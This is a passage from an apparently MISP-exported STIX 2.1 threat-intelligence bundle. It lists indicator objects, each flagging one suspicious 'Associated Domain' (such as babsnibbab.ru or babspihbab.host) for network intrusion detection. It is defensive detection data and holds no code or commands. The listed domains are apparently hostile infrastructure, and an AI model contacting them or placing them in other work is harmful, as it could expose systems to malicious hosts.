"spec_version": "2.1",
|
|
"id": "indicator--58db6c75-8374-4b11-ac52-4ad0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babslehbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c76-8d88-4411-bfa7-4858950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babslibbab.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c77-29f4-44a6-8a06-4322950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babslihbab.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c78-985c-44d8-bac8-4200950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsmabbab2.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c79-cf78-48df-a826-496a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsmebbab2.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c79-4b14-4c7e-b115-4156950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsmehbab.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c7a-8040-4432-911a-4f61950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsmibbab.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c7b-7d44-4c6c-86e1-43b4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsmihbab.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c7c-f698-4d49-81f6-4856950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsnabbab2.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c7d-de68-43f2-9579-482e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsnebbab2.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c7e-7198-436d-bd47-453b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsnehbab.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c7e-c470-43cb-8855-44fe950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsnibbab.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c7f-df10-43fb-82af-4f5a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsnihbab.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c80-b91c-408c-b68f-4460950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsofbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c81-2ee4-4dea-b68c-4693950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsohbab.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c82-f624-4360-a255-475f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babspabbab.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c83-3574-4203-a32d-4a74950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babspabbab2.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c84-621c-4022-90fc-48fb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babspebbab2.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c84-95c8-4c93-8492-4e32950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babspefbab.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c85-d390-484f-b553-4a50950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babspehbab.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c86-4ba8-4062-a379-446d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babspibbab.ua']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c87-eb60-48eb-9713-4414950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babspihbab.host']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c88-9cec-42df-a70f-4adf950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babspolbab.host']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c89-0dbc-4496-b6b3-4a7e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babstabbab.ua']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c89-3d5c-43c0-a623-48ab950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babstabbab2.ua']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c8a-e464-4a3a-aa74-4b65950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babstebbab2.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c8b-5780-471f-8b92-4de6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babstefbab.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c8c-e978-4d1c-bc74-4038950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babstehbab.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c8d-2acc-4137-bb1b-4eb2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babstibbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c8e-8a74-42de-bb33-4063950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babstihbab.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c8e-5fc4-4cf1-98f4-4ff2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babstolbab.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c8f-c9cc-437d-a95c-4d23950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babstrabbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c90-cc7c-4f33-98dc-4ff5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babstrabbab2.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c91-53bc-4a63-b695-47b8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babstrebbab2.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c92-d744-449d-a01a-4f55950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babstrefbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
